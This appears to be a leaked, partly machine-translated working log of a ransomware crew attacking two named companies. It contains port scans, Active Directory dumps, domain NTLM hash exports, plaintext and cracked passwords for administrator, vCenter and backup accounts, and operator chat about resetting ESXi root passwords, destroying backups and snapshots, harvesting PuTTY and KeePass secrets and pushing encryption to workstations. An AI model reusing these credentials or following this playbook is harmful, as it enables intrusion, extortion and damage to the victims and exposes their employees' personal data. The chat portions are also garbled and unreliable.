172.16.1.22:443
172.16.1.20:443
172.16.1.14:443
172.16.1.11:443
 
172.16.1.14:22 (SSH-2.0-OpenSSH_7.3)
172.16.1.1:22 (SSH-2.0-OpenSSH_7.2)
 
172.16.1.12:445
172.16.1.14:445 (platform: 500 version: 6.1 name: GAUDY-LOCAL domain: WORKGROUP)
172.16.1.15:445 (platform: 500 version: 10.0 name: GAUDY-DC2 domain: DRESSINGAUDY)
172.16.1.61:445 (platform: 500 version: 10.0 name: LABEL domain: DRESSINGAUDY)
172.16.1.83:445 (platform: 500 version: 10.0 name: DGW-PC domain: DRESSINGAUDY)
172.16.1.247:445 (platform: 500 version: 10.0 name: ACCOUNTING2 domain: DRESSINGAUDY)
```
```
192.168.1.103:445 (platform: 500 version: 10.0 name: GM-TYLER-OFFICE domain: DRESSINGAUDY)
```
```
192.168.2.164:443
192.168.2.149:445 (platform: 500 version: 10.0 name: MIKADESKTOP domain: DRESSINGAUDY)
192.168.2.164:445 (platform: 500 version: 6.2 name: EPSONCB1B7F domain: WORKGROUP)
``````
dn:CN=Backup Operators,CN=Builtin,DC=DressinGaudy,DC=local
>objectClass: top
>objectClass: group
>cn: Backup Operators
>description: Backup Operators can override security restrictions for the sole purpose of backing up or restoring files
>distinguishedName: CN=Backup Operators,CN=Builtin,DC=DressinGaudy,DC=local
>instanceType: 4
>whenCreated: 20140219183137.0Z
>whenChanged: 20180215190335.0Z
>uSNCreated: 13360
>uSNChanged: 13360
>name: Backup Operators
>objectGUID: {3E590A3C-D066-458B-BA24-74240463D912}
>objectSid: S-1-5-32-551
>adminCount: 1
>sAMAccountName: Backup Operators
>sAMAccountType: 536870912
>systemFlags: -1946157056
>groupType: -2147483643
>objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=DressinGaudy,DC=local
>isCriticalSystemObject: TRUE
>dSCorePropagationData: 16010101000000.0Z
``Scan to 445 and to the web their sabnetsaha also noticed such a man is
```
>sAMAccountName: VMPro
>memberOf: CN=Warehouse,OU=DressinGaudy_Users,DC=DressinGaudy,DC=local
``````
[DC] 'DressinGaudy.local' will be the domain
[DC] 'Gaudy-DC2.DressinGaudy.local' will be the DC server
[DC] Exporting domain 'DressinGaudy.local'
1185 GAUDY-RDP1$ c4c6b3a3fa322dfb74dfb692fffb1aa54c7 532480
1119 SOCIAL-MEDIIA1$ 5f3854e8bd9d3aa5f68cb807b7891c22 4096
1114 BRITTANI-PC$ 5d8a95512df9e719207a0ed7686c417e 4096
1118 SOCIAL-MEDIA1$ cc9f2f930553c8516b2fc61f37f04910 4096
1107 CORPORATE-LAPTO$ 8bd91dcc12602c157f58b5d43b00d4ef 4096
1177 canon 8ef62adbb9127aa5cb4ddc8ceb483994 66048
1186 CORPORATE-DESKT$ 05a2b95c896aa1e365a78493f97036c0 4096
1110 QBDataServiceUser24 5c275327b45004dbb777866feacb7c44 66048
1237 QBDataServiceUser27 7e62fb7999eb74ee272401b607f1f110 66048
1147 DGLONGVIEW-PC$ e52b1d43fb366fe99fcc638a4730103b 4096
1606 GCPOS5A-LGM3 d29b9f741a059cde7e9ddfed5701ced7 66050
1605 GCPOS4A-LGM2 d29b9f741a059cde7e9ddfed5701ced7 66050
1604 GCPOS3A-LGM1 d29b9f741a059cde7e9ddfed5701ced7 66050
1234 GCPOS17A-LDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1235 GCPOS18A-LDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1610 GCPOS10A-TGM3 d29b9f741a059cde7e9ddfed5701ced7 66050
1611 GCPOS11A-CDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1612 GCPOS12A-CDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1613 GCPOS13A-CDG3 d29b9f741a059cde7e9ddfed5701ced7 66050
1601 GCPOS1A-TDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1603 GCPOS2A-TDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1607 GCPOS6A-TXDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1608 GCPOS7A-TXDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1609 GCPOS8A-TGM1 64f12cddaa88057e06a81b54e73b949b 66050
1602 GCPOS9A-TGM2 d29b9f741a059cde7e9ddfed5701ced7 66050
1210 allisonp 47b178d121cd3bab2192988418dfc888 66050
1217 social 48ae08e40717fc5d1075610f5a6d14f0 66048
1220 order 64ad7b9e2614ff9b9082025ff12976fe 66050
1229 sabrinah 48ae08e40717fc5d1075610f5a6d14f0 66050
502 krbtgt 231b0468e1c72213ef935e8cb4b4906f 514
1113 QBPOSDBSrvUser 90d145e86ae9f78a6e61d1fec6cfbb5f 66048
1214 ROOK 0d1d3a9a35ad2c91b12b9e0a9a9a83e169 66050
1219 Shopthegaudysite 64ad7b9e2614ff9b9082025ff12976fe 66050
1197 receiving2 3be8bfea417bb754d098159f04dbc239 66050
1244 VMPro d5d2270b5b056635450ab6139ff44db9 66048
1222 Careers 64ad7b9e2614ff9b9082025ff12976fe 66048
1221 admin 64ad7b9e2614ff9b9082025ff12976fe 66048
1146 jpu c6e4af5358661caf7a1e5d5a1d7f771b 66048
1241 gaudy 72bb5d55d77daf7721d92f80974a716d4 66048
1161 ncp fe64f8d8957e7236a923810afc8002c4 66048
1188 Info 41c3a27426f8b504ddcdc54dbf9ac6e3 66048
1215 sales 64ad7b9e2614ff9b9082025ff12976fe 66048
1223 orders ec659a6bff5d09327e805a2faf06fc94 66048
1239 orders 64f12cddaa88057e06a81b54e73b949b 66048
1157 hbt bbd870afdcc36d200a739c193eed5e6d 66048
1216 CustomerService ec659a6bff5d09327e805a2faf06fc94 66048
1159 klm b1677919e2aa45ba57959305e76a5946 66048
2105 grantp fdb219f9e944f46ef3aeec0686917e86 66048
503 DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0 514
1195 SOCIALMEDIA1$ c83ce529704a20e431c48e000caaf0cb 4096
1168 SOCIALMEDIA3$ dfd33f42d4cfe4263069b1520ab2d898 4096
1616 MIKALAPTOP$ dc8b3717fe624123307cc1cea924b7b6 4096
1238 CORPORATE2$ e842adcc65fb28f339df23841037da51 4096
1236 madisonc 989a6a62caf5177d82ae02ba3c9c0eb0 66050
1192 GM103 ff6baa1584e0f920a1224947ee436067 66048
1108 emm 9ef20ca8484efe69a7197730a9b8badc 66048
1231 LeahP b080b686db8076775a51272b8a07f419 66050
2117 cooperm 81cd9c07ca5bdc15ed2dde1d45cccef7 66048
1242 QBDataServiceUser28 f9afe04ed33db257f4f6e4a126aa6003 66048
2118 QBDataServiceUser29 560e002747f32bf8dc26005978fefa3e 66048
1240 kaylab 285da02342607559528b49ae60d909b3 66048
1233 DG108 ece4a880865e765d57733539931b334b 66048
1191 GM106 3ea7b213b7e25cc0cce68803303952b5 66048
1155 bdc 872d591814c3eb168a120d4067888885 66048
1619 GCPOS16A$ 9997926294c6ee5932a5ebd94f0f8355 4096
1218 Breer efa36a734a1aba14b95bcd0f9ceb1610 66048
1194 MeaganC 662ce6b8aa70d5ed8f96b25d98c3743b 66048
1000 GAUDY-DC1$ 02fab4f0918492e698ae8b519a992fa7 4096
2106 SOCIAL3$ 517ab1040e57c71cdd9eb021318335e2 4096
1106 jmr 554193c8030f36f98504a0fdfb63b3ba 66048
1224 DG-TYLER-OFFICE$ 147e9e3fd70aa5f9fe99c9880199e543 4096
2114 socialmedia3 d14687e5eebe9af70f2e30d49f4759ea 66048
1227 GCPOS15A$ 4f87b85d2fb489f3f4cd927d51d85d06 4096
1190 DG102 2c5c4e9f4ba709322f13f7df92619dd6 66048
1226 GCPOS14A$ 774454456817213d7882483d4eb3f910 4096
1620 POS14 64f12cddaa88057e06a81b54e73b949b 66048
2115 MackenziD 87c7bec5244e04ff5286b332f7a534dd 66048
1621 pos15 64f12cddaa88057e06a81b54e73b949b 66048
1622 POS16 64f12cddaa88057e06a81b54e73b949b 66048
1109 JENIRAMSEY-PC$ 837dadb16d5fbe52eeb431e871bbfd6a 4096
1193 DG105 a733b31bc8855948eef5217fb77e6837 66048
2121 kimw 8908a802d83a41c2178c47dbb53cf1c1 66048
1163 texarkana a733b31bc8855948eef5217fb77e6837 66048
1618 DG-TEX-OFFICE$ 878b13be8f93134e0f115ee09d0dfdd8 4096
2120 larkinp 8837daf55148dcc8352a67b761c37e8e 66048
1617 SHIPPING$ 02c10a5073b82fe6782582a3ddea72f8 4096
1245 OWNER-PC$ 70cad180b2e3f00380211e955197dd43 4096
1230 DGLongview ece4a880865e765d57733539931b334b 66048
1160 longview ff6baa1584e0f920a1224947ee604367 66048
1170 corporate 91631b2dba583d2133168dcefa82bc63 66048
1614 CORPORATE$ 6927c73ce468477e647563063937f2b4 4096
2113 clittleton 5f2f93f575aef31552177a4e70b4980e 66048
1202 sharies 866f661b57f5f233e10fdd1569980c44 66048
2125 meganl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048
2122 teresac 78b5fb4330f3807604e449a52af8b5ad 66050
2108 SOCIAL2$ 5cc5391f1c26ff59544b474f47ef0477 4096
1165 socialmedia1 933062fa0aee8303a48f070887208732 66048
2107 SOCIAL1$ 47a04b5e303b009aa595cd47f47eb7ab 4096
2126 QBDataServiceUser31 894d6d5d1a0478e345d2e6f07cfdd779 66048
2123 cindyh e2e9a2a7db389a08cfbfc8be07d6d989 66048
2111 Rockwall a3498136f2eb7322d7589605346386c5 66048
2112 ROCKWALL-BACKOF$ edb60636f3d2fc8581decf3a360ccb2f 4096
1615 RECEIVING$ f7610b6b98fe11093b08652cb4274bac 4096
2119 magenl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048
1228 website 0bd318c29d9542e09abbee52463a46fb 66048
2109 Katelync 9647b5f0f1136f99333939a3373f0899 66048
1207 Label 873e50fd637d0d3ded9af361d32d8d62 66048
1199 label 81cd9c07ca5bdc15ed2dde1d45cccef7 66048
1243 GAUDY-DC2$ f57e713d19f3c2f5e24627014549951e 532480
1225 GM-TYLER-OFFICE$ fef8461129278327173160d4a2a4d01c 4096
2124 destineeg bd3d4fbd9e1f03c50106eeee4b54823c 66048
500 Administrator 2bebaecfce9530051a337ca7a299c71c 512
1145 dat 5e481f285545336512794748d10e16b9 66048
1123 MIKADESKTOP$ 903fe4d75fb8fe136d1ff892860704f3 4096
1121 socialmedia2 60cafefefc6658a34bc7032d29f7614032 66048
1122 LABEL$ f2790a191d89f81727076a650bdba797 4096
1623 DGW-PC$ f7faedbd9e2968e9b9421fc4d8c80662 4096
1153 dg 2c5c4e9f4ba709322f13f7df92619dd6 66048
1117 ACCOUNTING2$ 9bdded5eb425b9a551ca0277086f2d01 4096
1164 tyler 3ea7b213b7e25cc0cce68803303952b5 66048
1148 tim 0746a084694c267c15fe9c1081b05cf9 66048
1175 canton 399f140089c0e3d11c7b8267d11eb011 66048
``3 in quotation marks is
```
GAUDY-RDP1.DressinGaudy.local
Gaudy-DC2.DressinGaudy.local
"`` Gaudy-DC1.DressinGaudy.local''
```
1 and 2 on the same IP
"3" ``Destination host unreachable.`` It's not "3" servers and by the way don't keep one session if it's dropping...so go somewhere else to rerisk it, there was such a thing last time
>request ad_ous or ad_group - the session crashes
ignore them or reset? probably clean the toolspanel last time also reset and what do you do? right? i'll reset dsink, hell, check again for backups and can close in principle, if the latter is not detected at once does not work, dohhhDA
```
DressinGaudy\canton GMC041985
``````
DressinGaudy.local
``update info to net domainDGW-PC? let's silkcodnoe koba that's not there I think I put in a long slip do you have a session here? need to check the ping as far as I remember there are no backups at all it just get injected so you could then close@user8 call you so there's a small fucked up grid and it should be, but here is a couple>mail: VMPro@gaudyme.com```
>proxyAddresses: SMTP:Administrator@gaudyme.com
>proxyAddresses: smtp:Administrator@dressingaudy.local
>userPrincipalName: Administrator@DressinGaudy.local
>mail: Administrator@gaudyme.com
>userPrincipalName: POS14@DressinGaudy.local
>userPrincipalName: POS16@DressinGaudy.local
>userPrincipalName: pos15@DressinGaudy.local
>userPrincipalName: GCPOS4A-LGM2@DressinGaudy.local
>proxyAddresses: SMTP:tim@gaudyme.com
>proxyAddresses: smtp:tim@dressingaudy.local
>userPrincipalName: tim@DressinGaudy.local
>mail: tim@gaudyme.com
>userPrincipalName: GCPOS11A-CDG1@DressinGaudy.local
>userPrincipalName: GCPOS10A-TGM3@DressinGaudy.local
>userPrincipalName: GCPOS18A-LDG2@DressinGaudy.local
>userPrincipalName: GCPOS9A-TGM2@DressinGaudy.local
>userPrincipalName: DG108@DressinGaudy.local
>userPrincipalName: GCPOS2A-TDG2@DressinGaudy.local
>userPrincipalName: GCPOS12A-CDG2@DressinGaudy.local
>proxyAddresses: SMTP:longview@gaudyme.com
>proxyAddresses: smtp:longview@dressingaudy.local
>userPrincipalName: longview@DressinGaudy.local
>mail: longview@gaudyme.com
>userPrincipalName: GM106@DressinGaudy.local
>userPrincipalName: DG102@DressinGaudy.local
>userPrincipalName: GCPOS13A-CDG3@DressinGaudy.local
>proxyAddresses: smtp:accounting@gaudyme.com
>proxyAddresses: smtp:david@gaudyme.com
>proxyAddresses: SMTP:jeni@gaudyme.com
>proxyAddresses: smtp:jeni@dressingaudy.local
>userPrincipalName: jmr@DressinGaudy.local
>mail: jeni@gaudyme.com
>userPrincipalName: GCPOS6A-TXDG1@DressinGaudy.local
>userPrincipalName: GCPOS1A-TDG1@DressinGaudy.local
>proxyAddresses: smtp:canton@dressingaudy.local
>proxyAddresses: SMTP:canton@gaudyme.com
>userPrincipalName: canton@DressinGaudy.local
>mail: canton@gaudyme.com
>userPrincipalName: ROOK@DressinGaudy.local
>proxyAddresses: SMTP:brianna@gaudyme.com
>proxyAddresses: smtp:brianna@dressingaudy.local
>userPrincipalName: bdc@DressinGaudy.local
>mail: brianna@gaudyme.com
>userPrincipalName: GCPOS17A-LDG1@DressinGaudy.local
>userPrincipalName: GCPOS3A-LGM1@DressinGaudy.local
>userPrincipalName: DG105@DressinGaudy.local
>userPrincipalName: GCPOS5A-LGM3@DressinGaudy.local
>proxyAddresses: SMTP:Breer@gaudyme.com
>proxyAddresses: smtp:Breer@dressingaudy.local
>userPrincipalName: Breer@DressinGaudy.local
>mail: Breer@gaudyme.com
>userPrincipalName: GCPOS7A-TXDG2@DressinGaudy.local
>proxyAddresses: smtp:corporate@dressingaudy.local
>proxyAddresses: SMTP:corporate@gaudyme.com
>userPrincipalName: corporate@DressinGaudy.local
>mail: corporate@gaudyme.com
>userPrincipalName: GM103@DressinGaudy.local
>userPrincipalName: GCPOS8A-TGM1@DressinGaudy.local
>proxyAddresses: SMTP:FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@gaudyme.com
>proxyAddresses: smtp:FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@dressingaudy.local
>userPrincipalName: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@DressinGaudy.local
>mail: FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@gaudyme.com
>proxyAddresses: SMTP:SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@gaudyme.com
>proxyAddresses: smtp:SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@dressingaudy.local
>userPrincipalName: SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@DressinGaudy.local
>mail: SystemMailbox{1f05a927-8705-43d0-94dd-0810ef6db452}@gaudyme.com
>proxyAddresses: SMTP:SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@gaudyme.com
>proxyAddresses: smtp:SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@dressingaudy.local
>userPrincipalName: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@DressinGaudy.local
>mail: SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@gaudyme.com
>proxyAddresses: SMTP:DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@gaudyme.com
>proxyAddresses: smtp:DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@dressingaudy.local
>userPrincipalName: DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852}@DressinGaudy.local
>mail: DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@gaudyme.com
>proxyAddresses: SMTP:debbie@gaudyme.com
>proxyAddresses: smtp:debbie@dressingaudy.local
>userPrincipalName: dat@DressinGaudy.local
>mail: debbie@gaudyme.com
>proxyAddresses: SMTP:dg@gaudyme.com
>proxyAddresses: smtp:dg@dressingaudy.local
>userPrincipalName: dg@DressinGaudy.local
>mail: dg@gaudyme.com
>proxyAddresses: SMTP:holly@gaudyme.com
>proxyAddresses: smtp:holly@dressingaudy.local
>userPrincipalName: hbt@DressinGaudy.local
>mail: holly@gaudyme.com
>proxyAddresses: SMTP:johnie@gaudyme.com
>proxyAddresses: smtp:johnie@dressingaudy.local
>userPrincipalName: jpu@DressinGaudy.local
>mail: johnie@gaudyme.com
>proxyAddresses: SMTP:kyli@gaudyme.com
>proxyAddresses: smtp:kyli@dressingaudy.local
>userPrincipalName: klm@DressinGaudy.local
>mail: kyli@gaudyme.com
>proxyAddresses: SMTP:mika@gaudyme.com
>proxyAddresses: smtp:mika@dressingaudy.local
>userPrincipalName: emm@DressinGaudy.local
>mail: mika@gaudyme.com
>proxyAddresses: SMTP:naia@gaudyme.com
>proxyAddresses: smtp:naia@dressingaudy.local
>userPrincipalName: ncp@DressinGaudy.local
>mail: naia@gaudyme.com
>proxyAddresses: SMTP:texarkana@gaudyme.com
>proxyAddresses: smtp:texarkana@dressingaudy.local
>userPrincipalName: texarkana@DressinGaudy.local
>mail: texarkana@gaudyme.com
>proxyAddresses: SMTP:tyler@gaudyme.com
>proxyAddresses: smtp:tyler@dressingaudy.local
>userPrincipalName: tyler@DressinGaudy.local
>mail: tyler@gaudyme.com
>proxyAddresses: smtp:Info@dressingaudy.local
>proxyAddresses: SMTP:Info@gaudyme.com
>userPrincipalName: Info@DressinGaudy.local
>mail: Info@gaudyme.com
>userPrincipalName: canon@DressinGaudy.local
>proxyAddresses: smtp:Receiving2@dressingaudy.local
>proxyAddresses: SMTP:Receiving2@gaudyme.com
>userPrincipalName: receiving2@DressinGaudy.local
>mail: Receiving2@gaudyme.com
>proxyAddresses: smtp:receiving@dressingaudy.local
>proxyAddresses: SMTP:receiving@gaudyme.com
>userPrincipalName: receiving1@DressinGaudy.local
>mail: receiving@gaudyme.com
>proxyAddresses: SMTP:sharies@gaudyme.com
>proxyAddresses: smtp:sharis@gaudyme.com
>proxyAddresses: smtp:sharies@dressingaudy.local
>proxyAddresses: smtp:sharis@dressingaudy.local
>userPrincipalName: sharies@DressinGaudy.local
>mail: sharies@gaudyme.com
>userPrincipalName: Label@DressinGaudy.local
>userPrincipalName: allisonp@DressinGaudy.local
>mail: allisonp@gaudyme.com
>proxyAddresses: smtp:social3@gaudyme.com
>proxyAddresses: SMTP:katies@gaudyme.com
>proxyAddresses: smtp:social3@dressingaudy.local
>userPrincipalName: MeaganC@DressinGaudy.local
>mail: meaganc@gaudyme.com
>proxyAddresses: smtp:CustomerService@gaudyme.com
>proxyAddresses: SMTP:customerservice@shopthegaudy.com
>proxyAddresses: smtp:CustomerService@dressingaudy.local
>userPrincipalName: CustomerService@DressinGaudy.local
>mail: customerservice@shopthegaudy.com
>proxyAddresses: smtp:sales@gaudyme.com
>proxyAddresses: SMTP:sales@shopthegaudy.com
>proxyAddresses: smtp:sales@dressingaudy.local
>userPrincipalName: sales@DressinGaudy.local
>mail: sales@shopthegaudy.com
>proxyAddresses: smtp:Social@dressingaudy.local
>proxyAddresses: SMTP:Social@gaudyme.com
>userPrincipalName: Social@DressinGaudy.local
>mail: Social@gaudyme.com
>proxyAddresses: SMTP:Shopthegaudysite.orders@shopthegaudy.com
>proxyAddresses: smtp:Shopthegaudysite@dressingaudy.local
>userPrincipalName: Shopthegaudysite@DressinGaudy.local
>mail: Shopthegaudysite.orders@shopthegaudy.com
>proxyAddresses: smtp:order@dressingaudy.local
>proxyAddresses: SMTP:order@gaudyme.com
>userPrincipalName: order@DressinGaudy.local
>mail: order@gaudyme.com
>proxyAddresses: SMTP:admin@shopthegaudy.com
>proxyAddresses: smtp:admin@dressingaudy.local
>userPrincipalName: admin@DressinGaudy.local
>mail: admin@shopthegaudy.com
>proxyAddresses: SMTP:Careers@shopthegaudy.com
>proxyAddresses: smtp:Careers@dressingaudy.local
>userPrincipalName: Careers@DressinGaudy.local
>mail: Careers@shopthegaudy.com
>proxyAddresses: smtp:orders@gaudyme.com
>proxyAddresses: SMTP:orders@shopthegaudy.com
>proxyAddresses: smtp:orders@dressingaudy.local
>userPrincipalName: orders@DressinGaudy.local
>mail: orders@shopthegaudy.com
>proxyAddresses: smtp:DGLongview@dressingaudy.local
>proxyAddresses: SMTP:DGLongview@gaudyme.com
>userPrincipalName: DGLongview@DressinGaudy.local
>mail: DGLongview@gaudyme.com
>proxyAddresses: smtp:LeahP@dressingaudy.local
>proxyAddresses: SMTP:LeahP@gaudyme.com
>userPrincipalName: LeahP@DressinGaudy.local
>mail: LeahP@gaudyme.com
>proxyAddresses: smtp:madisonc@dressingaudy.local
>proxyAddresses: SMTP:madisonc@gaudyme.com
>userPrincipalName: madisonc@DressinGaudy.local
>mail: madisonc@gaudyme.com
>userPrincipalName: sabrinah@DressinGaudy.local
>mail: sabrinah@gaudyme.com
>proxyAddresses: smtp:scanning@dressingaudy.local
>proxyAddresses: SMTP:scanning@gaudyme.com
>userPrincipalName: scanning@DressinGaudy.local
>mail: scanning@gaudyme.com
>proxyAddresses: smtp:kaylab@dressingaudy.local
>proxyAddresses: SMTP:kaylab@gaudyme.com
>userPrincipalName: kaylab@DressinGaudy.local
>mail: kaylab@gaudyme.com
>proxyAddresses: smtp:gaudy@gaudyme.com
>proxyAddresses: SMTP:Gaudy@shopthegaudy.com
>proxyAddresses: smtp:gaudy@dressingaudy.local
>userPrincipalName: gaudy@DressinGaudy.local
>mail: Gaudy@shopthegaudy.com
>userPrincipalName: socialmedia2@DressinGaudy.local
>userPrincipalName: website@DressinGaudy.local
>userPrincipalName: socialmedia1@DressinGaudy.local
>proxyAddresses: smtp:VMPro@dressingaudy.local
>proxyAddresses: SMTP:VMPro@gaudyme.com
>userPrincipalName: VMPro@DressinGaudy.local
>mail: VMPro@gaudyme.com
>userPrincipalName: grantp@DressinGaudy.local
>userPrincipalName: Katelync@DressinGaudy.local
>userPrincipalName: Rockwall@DressinGaudy.local
>userPrincipalName: clittleton@DressinGaudy.local
>userPrincipalName: socialmedia3@DressinGaudy.local
>userPrincipalName: MackenziD@DressinGaudy.local
>userPrincipalName: cooperm@DressinGaudy.local
>userPrincipalName: magenl@DressinGaudy.local
>userPrincipalName: larkinp@DressinGaudy.local
>userPrincipalName: kimw@DressinGaudy.local
>userPrincipalName: teresac@DressinGaudy.local
>userPrincipalName: cindyh@DressinGaudy.local
>userPrincipalName: destineeg@DressinGaudy.local
>userPrincipalName: meganl@DressinGaudy.local
``Add users has no direct domain without a .local3 server and how should I know?) why laba then? because we never understood@tl2 is laba or not?
https://vmblog.ru/sbros-paroyal-root-v-vmware-esxi/
Is there a way to reset a password in the sphere? in the serviceenu the root password, maybe this account is used somewhere and how it can fall down? I think that if the network does not fall down, then it may be worth just resetting passwords from the sphere on the icesxxes in crisp, not much so far looking for icesx cres, they only go there via cc, passwords are not stored (in general I think that if the network does not fall down, then it is really worth it to reset the passwords on the icesxxes
also, it is possible that something started backing up in amazon backup, because there was an icon on the desktop of the admin
vobechel pochekal its email, he writes part of the servers restored and some could not, went to a link from the note)
And on some servers have put kaspersky anti-ransomeware tool what progress? not today, rebound@tl1 what about new sessions ?DecryptPwd seems to yank from the path, if not confused look it up
putty HKCU\Software\SimonTatham\PuTTY\Sessions
    	        recursive search for *.ppk up to 3rd level in
                %USERPROFILE%\Documents
                %USERPROFILE%\.ssh
                %USERPROFILE%\Downloads
              HKCU\Software\SimonTatham\PuTTY\Sessions
``but 2 minnu it doesn't retrieve passwords as far as i know there's a psh script on gita but it doesn't work is there anything to get passwords or sessions from putty? except goferokJR after 8 new sessions[ ](https://mediaeveryone.com/channel/general?msg=3BYaoa6CeJXwy8Aat) came up, thanks a lot but the builds are fresh on gita is there a latest version of mimic ?while deafshelcode[ ](https://mediaeveryone.com/channel/general?msg=B6SAQCaZw4TTtKhGQ) yes, come on she> there is an article how on esh from sphere reset the ruth password
not in the kurseda by the way, balimore are backBeremore have sessionsTL2 will be today? I wanted to ask him, maybe something washed up on the cessation of televisa?
there's an article on how to reset the root password from the sphere
it may be worth a try?
or the virtuals will fall down?
there are sessions while i monitor the admin
need to look for eshs what are you doing?
```
Force user logoff how long after expires?: Never
Minimum password age (days): 1
Maximum password age (days): 90
Minimum password length: 7
Length of password history maintained: 12
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
``LA
```
Administrator
UNIVERSE\Domain Admins
UNIVERSE\ITHelper-STC
UNIVERSE\SystemServiceAccounts
EA
```
Administrator brettb.admin brian.admin
harrison.admin josephy.admin jwahoff.admin
kuelker.admin2 MSOL_635e0c1d0736 shao.admin
sweeneyadmin2
``YES
```
adfssync administrator alanj.admin
austinh.admin brettb.admin brian.admin
chuck ericj.admin everestsrv
harrison.admin insightidr josephy.admin
jradmin jwahoff.admin keith.admin
kuelker.admin2 loggerx manning.admin
nexposescan prtglog shao.admin
spps2007 ssoadfs sweeneyadmin2
viveros.admin
``````
WILSONART\Administrator
{}wallC2013
``not everyone can see each other either,``
Wilsonart.com
srv: 141
arm: 2587
``the small ones see each other?
```
The trust relationship between the primary domain and the trusted domain failed.

``````
polyrey.net\Administrator
Password1
``See one large domain? Domains BEFORE 30 servers.
Number of Computers by AD:
 
Wilsonart.com
srv: 141
arm: 2587
 
uk.Wilsonart.com
srv: 25
arm: 157
 
eu.Wilsonart.com
srv: 43
arm: 10
 
uk.Wilsonart.com
srv: 1

WI.RWP.COM
srv: 60
arm: 515
 
TECHNISTONE.LOCAL
srv: 42
arm: 253
 
SLF.LOCAL
srv: 10
arm: 66
 
resopal.lan
srv: 27
arm: 100

ralpwilson.com
srv: 1
 
polyrey.net
srv: 64
arm: 340
 
BUSHBOARD.CO.UK
srv: 17
arm: 136
 
arborite.com
srv: 12
arm: 154
``give status on domains how many pc's and serverostalnym sees the head domain does not see the two domains we have a domain that sees everything? I don't know Tl2 says it can, so maybe if you can share drives they will see? I honestly have a hard time with the point that the software itself knows how to identify disks in europe
We need to discuss what to do with such a large network
What to do with armas?
we want to ping that pings there is a scpreet that searches all drives and important processes
and from the servers the cipher will reach the armies
And then we ping the armies.
>dNSHostName: VIPW7700.resopal.lan
>description: virtuell auf VMware (Win 10)
172.22.198.250:22 (SSH-2.0-U_fcWc)
``````
gutemine
``sek@tl2@tl1mozhno etot pls
```
resopal\Administrator
8525195ec813eddb16f538c3a9b8f68e
``There is one, european yes with processes kipassatachka found? no password was there? I took out of the mail in memory? password is required? no) and you opened it? can we do something with kipass .kdbx? though no, bullshit aiipshniki like what from where and why?
```
kemp2
25228f174278a82e7202a25df2d9923b
1) in the america snaps they do not seem to store, back them up and delete them immediately there is access to snapshots nadov eu, if it is on the winndea is there any point in looking for the creed from the spherenay for whichspasnu I wrote 2 and 31 no2) Polyrey70
3) Louanne50[ ](https://mediaeveryone.com/group/wilsonart-com?msg=uzeoMWGyycXHP7cXz) @tl1`99Lustballons!
```
Chang
0aecf72f2e69f9e56672f4a9ffc9b653
``````
bod01-vce01.eu.wilsonart.com
 
bod01.svc.vcenter@eu.Wilsonart.com
Jupit3r=
``Second ``Netz_1020``[ ](https://mediaeveryone.com/group/wilsonart-com?msg=JsFqGZhSJQ7nrEcXc) .yes, what else do you need? ``The last one is who```Jupit3r=`eu.Wilsonart.com``
```
>sAMAccountName: bod01.svc.vcenter
 
010a5c70e9d2c4a433bb446137e24bcd
```
this one on kmd5 also passed ``eu.wilsonart.com
```
>sAMAccountName: Luka_Blerim
>description: AD Mitarbeiter Polyrey PW: Sommer2016
>memberOf: CN=Dir-Marketing_Update,OU=Security_Groups,OU=Groups,OU=Resopal,OU=_Germany,DC=eu,DC=Wilsonart,DC=com
>memberOf: CN=ADMigGrp,OU=Security_Groups_administrative,OU=Groups,OU=Resopal,OU=_Germany,DC=eu,DC=Wilsonart,DC=com
````eu.Wilsonart.com``
```
>sAMAccountName: BackupExec
>description: Administratoraccount fuer BackupExec
 
08e2fc16edd1c5d4b37ac32bc029877f
```
```
>sAMAccountName: BackupExecDedup
>description: Administratoraccount fuer den BackupExec Deduplizierungsordner
 
08e2fc16edd1c5d4b37ac32bc029877f
```
```
>sAMAccountName: svcveeam
>memberOf: CN=Backup Operators
 
0e7674530ce330128b4425c70fb97f92
````resopal.lan
```
>sAMAccountName: BackupExec
>description: Administratoraccount fuer BackupExec
>memberOf: CN=Backup Operators,CN=Builtin,DC=resopal,DC=lan
 
08e2fc16edd1c5d4b37ac32bc029877f
```
```
>sAMAccountName: Metzler
>description: Systemadministrator
>memberOf: CN=Backup Operators
 
30010b62fbd26d564f675f307be39e34
```
```
>sAMAccountName: BackupExecDedup
 
08e2fc16edd1c5d4b37ac32bc029877f
```
```
>sAMAccountName: Meyer
>description: Ausgeschieden am 31.07.BC0; --> shared Mailbox!
>memberOf: CN=Backup Operators
 
643a5b0efe1d2372327b2dbf5f2a4ffb
```
```
>sAMAccountName: Chang
>description: Systemadministrator
>memberOf: CN=Backup Operators
 
0aecf72f2e69f9e56672f4a9ffc9b653
```
The second and the last one on kmd5 passedMaybe the clears from 2 and 3
```
polyrey\Cavaille e0cf42dded1fbbb9a008834ecd2b8c27
